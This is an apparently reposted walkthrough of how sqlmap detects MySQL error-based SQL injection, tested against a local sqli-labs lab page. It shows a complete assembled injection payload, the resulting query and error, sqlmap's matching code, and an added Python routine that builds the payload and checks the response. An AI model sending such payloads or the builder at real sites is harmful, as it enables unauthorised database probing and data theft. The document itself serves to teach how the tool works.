
Python: a close reading of the sqlmap source, error-based blind injection

2019-11-14 17:40:32
Source: reposted
Contributed by: a site user

Target URL

http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1

Payload generation

<test>
    <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
    <stype>2</stype>
    <level>1</level>
    <risk>0</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector>
    <request>
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>MySQL</dbms>
        <dbms_version>&gt;= 5.0</dbms_version>
    </details>
</test>

This test XML element is taken from the file payloads.xml.

sqlmap reads the test elements from payloads.xml, iterates over them, and generates the corresponding payload for each one to test.

Taking the test above as an example: when the loop reaches this test, an inner loop also walks the boundary elements (also defined in payloads.xml) one by one to find a boundary that matches.

What counts as a match?

Note the child nodes of the test element above: where=1 and clause=1.

A boundary matches the current test if and only if the value of the boundary's where node contains the test's where value and the value of the boundary's clause node contains the test's clause value; only then is a payload generated from the pair.

For example:

<boundary>
    <level>1</level>
    <clause>1</clause>
    <where>1,2</where>
    <ptype>2</ptype>
    <prefix>'</prefix>
    <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary>

The where node of this boundary has the value 1,2, which contains the value of the test's where node (1).

Likewise, the clause node of the boundary has the value 1, which contains the value of the test's clause node (1).

Therefore this boundary and this test match.

The value of the test element's payload node is:

AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

The final payload is assembled from the test's payload child node together with the boundary's prefix and suffix child nodes, that is:

final payload = URL parameter + boundary.prefix + test.payload + boundary.suffix

After [RANDNUM], [DELIMITER_START] and [DELIMITER_STOP] have been substituted,

the generated payload looks like this:

Payload: id=1' AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'pujM'='pujM

where:

  • URL parameter: id=1
  • prefix: '
  • payload: AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  • suffix: AND 'pujM'='pujM

The MySQL statement that is finally executed is:

SELECT *
FROM users
WHERE id = '1'
AND (
    SELECT 1497
    FROM (
        SELECT
            COUNT(*),
            CONCAT(
                CHAR(58, 101, 121, 111, 58),
                (SELECT (CASE WHEN (1497 = 1497) THEN 1 ELSE 0 END)),
                CHAR(58, 97, 98, 104, 58),
                FLOOR(RAND(0) * 2)
            ) x
        FROM information_schema.TABLES
        GROUP BY x
    ) a
)
AND 'pujM' = 'pujM'

If the URL http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 is injectable, executing this statement raises the following error:

Duplicate entry ':eyo:1:abh:1' for key 'group_key'

Source code walkthrough

# In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP:
    # Perform the test's request and grep the response
    # body for the test's <grep> regular expression
    try:
        page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
        output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
                or extractRegexResult(check, listToStrValue(headers.headers \
                if headers else None), re.DOTALL | re.IGNORECASE) \
                or extractRegexResult(check, threadData.lastRedirectMsg[1] \
                if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
                threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)

        if output:
            result = output == "1"
            if result:
                infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
                logger.info(infoMsg)

                injectable = True

    except sqlmapConnectionException, msg:
        debugMsg  = "problem occurred most likely because the "
        debugMsg += "server hasn't recovered as expected from the "
        debugMsg += "error-based payload used ('%s')" % msg
        logger.debug(debugMsg)

The final payload is passed to the Request.queryPage function, which sends the request and returns the response body as page.

The value of the test element's grep child node is a regular expression: <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>

From the data above, we know that

[DELIMITER_START]=:eyo:

[DELIMITER_STOP] = :abh:

so the regular expression that is finally generated is :eyo:(?P<result>.*?):abh: (it differs on every run, because both :eyo: and :abh: are generated randomly).

page and the regular expression are then passed to the function extractRegexResult:

def extractRegexResult(regex, content, flags=0):
    """
    Returns 'result' group value from a possible match with regex on a given
    content
    """

    retVal = None

    if regex and content and '?P<result>' in regex:
        match = getCompiledRegex(regex, flags).search(content)

        if match:
            retVal = match.group("result")

    return retVal

The function is simple: it uses the regular expression to check whether the content contains the expected data. If it does, the matched data (the 'result' group) is returned; otherwise it returns None.

From the foregoing, if the URL is injectable, the return value retVal should equal "1":

if output:
    result = output == "1"
    if result:
        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
        logger.info(infoMsg)
        injectable = True

Matching Duplicate entry ':eyo:1:abh:1' for key 'group_key' against the regular expression :eyo:(?P<result>.*?):abh: yields 1,

so the URL http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 is reported as injectable.
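The boundary matching, prefix/suffix assembly, placeholder substitution and delimiter grep described above, re-implemented as an added example (this is not sqlmap's own code). It parses constructed copies of the two payloads.xml fragments quoted in this article, and the sample values 1497, :eyo:, :abh: and pujM are chosen to reproduce the article's payload; the check only returns True when the database error text is echoed into the response, which is why hiding database errors from users defeats this detection method.

```python
import re
import xml.etree.ElementTree as ET

# Constructed copies of the two payloads.xml fragments quoted in the article.
TEST_XML = """<test><clause>1</clause><where>1</where>
<request><payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload></request>
<response><grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep></response></test>"""
BOUNDARY_XML = """<boundary><clause>1</clause><where>1,2</where>
<prefix>'</prefix><suffix>AND '[RANDSTR]'='[RANDSTR]</suffix></boundary>"""

TEST = ET.fromstring(TEST_XML)
BOUNDARY = ET.fromstring(BOUNDARY_XML)

def _values(node, tag):
    # "1,2" -> {"1", "2"}; a missing node yields {""} and never matches "1".
    return set((node.findtext(tag) or "").split(","))

def boundary_matches(test, boundary):
    """The boundary's where/clause sets must contain the test's where/clause."""
    return (_values(test, "where") <= _values(boundary, "where")
            and _values(test, "clause") <= _values(boundary, "clause"))

def char_call(s):
    """Encode a delimiter as MySQL CHAR(...), as in the article's final payload."""
    return "CHAR(%s)" % ",".join(str(ord(c)) for c in s)

def build_payload(param, test, boundary, randnum, start, stop, randstr):
    """final payload = URL parameter + prefix + test.payload + suffix."""
    body = (test.findtext("request/payload")
            .replace("[RANDNUM]", str(randnum))
            .replace("'[DELIMITER_START]'", char_call(start))
            .replace("'[DELIMITER_STOP]'", char_call(stop)))
    suffix = boundary.findtext("suffix").replace("[RANDSTR]", randstr)
    return "%s%s %s %s" % (param, boundary.findtext("prefix"), body, suffix)

def extract_regex_result(regex, content, flags=re.DOTALL | re.IGNORECASE):
    """Same contract as sqlmap's helper: the 'result' group, or None."""
    if regex and content and "?P<result>" in regex:
        match = re.search(regex, content, flags)
        if match:
            return match.group("result")
    return None

def is_injectable(response_body, test, start, stop):
    """True only if the echoed DB error carries '1' between the delimiters."""
    grep = (test.findtext("response/grep")
            .replace("[DELIMITER_START]", start).replace("[DELIMITER_STOP]", stop))
    return extract_regex_result(grep, response_body) == "1"
```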

Recommended reading

Five error-based techniques in MySQL injection and concrete exploitation cases
